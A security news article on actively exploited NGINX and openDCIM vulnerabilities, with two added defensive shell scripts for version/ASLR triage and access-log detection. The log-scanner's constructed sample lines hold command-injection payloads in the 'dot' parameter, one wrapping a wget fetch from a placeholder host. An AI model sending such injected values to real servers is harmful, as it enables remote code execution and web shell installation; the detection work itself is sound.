A newly disclosed security vulnerability affecting both NGINX Plus and NGINX Open Source is already being actively exploited in the wild, according to cybersecurity researchers at VulnCheck.
The flaw, tracked as CVE-2026-42945, carries a critical CVSS score of 9.2 and impacts NGINX versions 0.6.27 through 1.30.0. Security experts say the vulnerability stems from a heap buffer overflow in the ngx_http_rewrite_module, a weakness reportedly introduced as far back as 2008.
What Makes CVE-2026-42945 Dangerous?
Successful exploitation could allow an unauthenticated attacker to crash NGINX worker processes or potentially achieve remote code execution (RCE) using specially crafted HTTP requests.
However, researchers note that full remote code execution is only feasible when Address Space Layout Randomization (ASLR) is disabled. ASLR randomizes where a process's code, stack and heap are placed in memory, so an attacker who corrupts the heap cannot reliably predict the addresses an exploit needs to hit.
Security researcher Kevin Beaumont explained that exploitation depends heavily on the target system’s configuration.
“It relies on a specific NGINX config to be vulnerable, and for an attacker to know or discover the config to exploit it. To reach RCE, ASLR also needs to have been disabled on the box.”
Researchers from AlmaLinux echoed similar concerns, stating that while reliable code execution may be difficult on systems with ASLR enabled, denial-of-service (DoS) attacks through worker process crashes remain highly practical.
The AlmaLinux maintainers warned:
“Not easy does not mean impossible. The worker-crash DoS is exploitable enough on its own that we recommend treating this as urgent.”
Exploitation Attempts Already Detected
According to VulnCheck, attackers have already begun weaponizing the flaw. The company observed exploitation attempts targeting its honeypot infrastructure shortly after public disclosure of the vulnerability.
At this stage, researchers have not determined the attackers’ exact objectives or whether successful compromises have occurred in real-world environments.
Organizations running vulnerable NGINX deployments are strongly advised to apply the latest patches released by F5 immediately.
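The following triage script is an added example, not code from the advisory, from F5, or from the researchers quoted above. It checks the three facts this section turns on: whether the installed NGINX falls inside the affected range 0.6.27 through 1.30.0, whether the Linux host still has ASLR enabled (the precondition the researchers name for turning a worker crash into RCE), and which rewrite-module directives the effective configuration contains so they can be reviewed. It assumes a Linux host with the standard kernel.randomize_va_space knob and an nginx binary on PATH; function names are my own.

```shell
#!/bin/sh
# Added triage helper (not from the advisory, F5 or NGINX).
# Assumptions: Linux, /proc/sys/kernel/randomize_va_space present
# (0 = ASLR off, 1 = partial, 2 = full), nginx binary on PATH.

# Turn "1.26.3" into one comparable integer: major*1000000 + minor*1000 + patch.
version_key() {
    set -- $(printf '%s' "$1" | tr '.' ' ')
    printf '%d' $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# True (exit 0) when the version string lies in the affected range 0.6.27..1.30.0.
# Caveat: distributions backport fixes without bumping the upstream version,
# so a match here means "check the package changelog", not "vulnerable".
nginx_version_affected() {
    v=$(version_key "$1")
    lo=$(version_key 0.6.27)
    hi=$(version_key 1.30.0)
    [ "$v" -ge "$lo" ] && [ "$v" -le "$hi" ]
}

# `nginx -v` prints "nginx version: nginx/1.26.3" on stderr; extract the number.
installed_nginx_version() {
    nginx -v 2>&1 | sed -n 's#.*nginx/\([0-9][0-9.]*\).*#\1#p'
}

# Interpret the randomize_va_space value: 1 or 2 means ASLR is on.
aslr_enabled_value() {
    case "$1" in
        1|2) return 0 ;;
        *)   return 1 ;;
    esac
}

aslr_enabled() {
    aslr_enabled_value "$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)"
}

# `nginx -T` dumps the merged effective configuration; list the
# ngx_http_rewrite_module directives in it for manual review.
rewrite_directives() {
    nginx -T 2>/dev/null | grep -nE '^[[:space:]]*(rewrite|if|set|return|break|rewrite_log)[[:space:]]'
}

main() {
    ver=$(installed_nginx_version)
    if [ -z "$ver" ]; then
        printf 'nginx binary not found on PATH\n'
        return 0
    fi
    if nginx_version_affected "$ver"; then
        printf 'nginx %s is inside the affected range; confirm a patched build from F5 or your distro\n' "$ver"
    else
        printf 'nginx %s is outside the affected range\n' "$ver"
    fi
    if aslr_enabled; then
        printf 'ASLR enabled (randomize_va_space=%s)\n' "$(cat /proc/sys/kernel/randomize_va_space)"
    else
        printf 'WARNING: ASLR disabled or unreadable; this is the stated precondition for RCE\n'
    fi
    printf 'rewrite-module directives in effective config:\n'
    rewrite_directives
    return 0
}

main "$@"
```

Run it as root (or a user allowed to execute nginx -T) on each NGINX host; the directive listing is only a starting point for review, since the advisory does not say which rewrite configuration is required to reach the bug.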
Critical openDCIM Vulnerabilities Also Under Attack
In a separate advisory, VulnCheck also revealed active exploitation attempts targeting multiple critical vulnerabilities in openDCIM, an open-source platform used for managing data center infrastructure.
Two of the flaws carry CVSS scores of 9.3:
CVE-2026-28515 – Missing Authorization Vulnerability
This vulnerability allows authenticated users to access LDAP configuration functionality regardless of assigned permissions.
Researchers warned that in Docker deployments where REMOTE_USER is configured without proper authentication enforcement, attackers may gain unauthorized access without credentials, potentially enabling malicious configuration changes.
CVE-2026-28517 – Operating System Command Injection
The second flaw affects the report_network_map.php component, which takes a request parameter named dot and passes it directly to a shell command without sanitization. An attacker who can reach that page can therefore execute arbitrary operating system commands on the server.
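As an added example (not from VulnCheck, openDCIM or the researchers quoted on this page), the script below scans web-server access logs for requests to report_network_map.php whose dot parameter carries shell metacharacters, which is the shape of input the injection described above needs. It assumes the common combined log format with the request line in double quotes; the log lines embedded below are constructed for the demonstration, not captured traffic, and the function names are my own.

```shell
#!/bin/sh
# Added detection helper (not from VulnCheck or openDCIM).
# Assumption: combined log format, openDCIM served under any path prefix.

# Extract the raw dot= value from a request to report_network_map.php, or print nothing.
dot_param() {
    printf '%s\n' "$1" | sed -n 's/.*report_network_map\.php[^ ]*[?&]dot=\([^& "]*\).*/\1/p'
}

# Decode the percent-encodings an attacker would use to smuggle shell syntax.
# %0a (newline) separates commands just like ';', so it is folded into ';'.
decode_meta() {
    printf '%s\n' "$1" | sed -e 's/%3[bB]/;/g' -e 's/%7[cC]/|/g' -e 's/%60/`/g' \
                             -e 's/%24/$/g' -e 's/%28/(/g' -e 's/%26/\&/g' -e 's/%0[aA]/;/g'
}

# True (exit 0) when the line looks like an injection attempt against the dot parameter.
is_injection_attempt() {
    v=$(dot_param "$1")
    [ -n "$v" ] || return 1
    d=$(decode_meta "$v")
    case "$d" in
        *\;*|*\|*|*\`*|*\$\(*|*\&*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read log lines on stdin, print the suspicious ones.
flag_injection_lines() {
    while IFS= read -r line; do
        if is_injection_attempt "$line"; then
            printf '%s\n' "$line"
        fi
    done
}

# Same input, but print only the number of flagged lines.
count_injection_lines() {
    flag_injection_lines | wc -l | tr -d ' '
}

# Constructed sample: one benign request, two injection attempts, one unrelated page.
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET /opendcim/report_network_map.php?dot=dot HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2026:10:00:05 +0000] "GET /opendcim/report_network_map.php?dot=dot%3Bid HTTP/1.1" 200 88 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2026:10:00:07 +0000] "GET /opendcim/report_network_map.php?dot=%24%28wget%20http%3A%2F%2Fexample.invalid%2Fs.php%29 HTTP/1.1" 500 0 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2026:10:00:09 +0000] "GET /opendcim/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"'

# Demonstration run on the constructed sample; on a real host use
#   flag_injection_lines < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | flag_injection_lines
```

A hit is a reason to pull the full request and check the web root for newly written PHP files, since the reported activity ends with a PHP web shell; the absence of hits proves nothing if the attacker used an encoding this decoder does not cover.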
Vulnerability Chaining Enables Remote Shell Access
The vulnerabilities were discovered alongside another critical flaw, CVE-2026-28516, by VulnCheck researcher Valentin Lobstein earlier this year.
According to Lobstein, attackers can chain the three vulnerabilities together to achieve full remote code execution in as few as five HTTP requests, ultimately deploying a reverse shell on vulnerable systems.
Researchers Link Activity to Chinese IP Address
VulnCheck's Caitlin Condon said the observed attack activity currently appears to originate from a single Chinese IP address.
Researchers also believe the attackers are using a customized version of the AI-powered vulnerability discovery tool Vulnhuntr to identify vulnerable systems automatically before deploying a PHP web shell.
Recommended Actions for Organizations
Security teams are encouraged to take the following steps immediately:
- Update NGINX and openDCIM installations to the latest patched versions
- Verify that ASLR remains enabled on Linux systems (kernel.randomize_va_space should be 2)
- Review NGINX rewrite module configurations for unnecessary exposure
- Restrict public access to administrative interfaces
- Monitor logs for suspicious HTTP requests and unexpected shell activity
- Audit Docker deployments for insecure REMOTE_USER configurations
With exploitation already underway, organizations should treat these vulnerabilities as high-priority threats requiring immediate remediation.
